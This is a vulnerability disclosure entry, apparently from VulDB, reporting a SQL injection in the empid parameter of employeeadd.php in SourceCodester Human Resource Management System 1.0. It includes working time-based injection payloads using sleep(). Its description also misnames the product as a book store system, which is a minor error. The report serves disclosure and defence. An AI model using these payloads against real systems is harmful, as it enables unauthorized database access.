| タイトル | Human Resource Management System 1.0 SQL Injection |
|---|
| 説明 | Description: Vulnerability was found in SourceCodester Book Store Management System 1.0. A SQL Injection vulnerability in /hrm/employeeadd.php with `empid` handler.
The product(s): https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
Affected component(s): /hrm/employeeadd.php
Proof of Concept:
Login as admin and go to `http://localhost/hrm/employeeadd.php`
Payload SQLi with sleep(1): /hrm/employeeadd.php?empid=1%27%20or%20sleep(1)%20--%20-
Payload SQLi with sleep(10): /hrm/employeeadd.php?empid=1%27%20or%20sleep(10)%20--%20- |
|---|
| ソース | ⚠️ https://github.com/leecybersec/bug-report/tree/main/sourcecodester/oretnom23/hrm/employeeadd-sqli |
|---|
| ユーザー | leecybersec (UID 36724) |
|---|
| 送信 | 2022年12月02日 08:42 (3 年 ago) |
|---|
| モデレーション | 2022年12月03日 17:16 (1 day later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 214775 [SourceCodester Human Resource Management System 1.0 /hrm/employeeadd.php empid SQLインジェクション] |
|---|
| ポイント | 20 |
|---|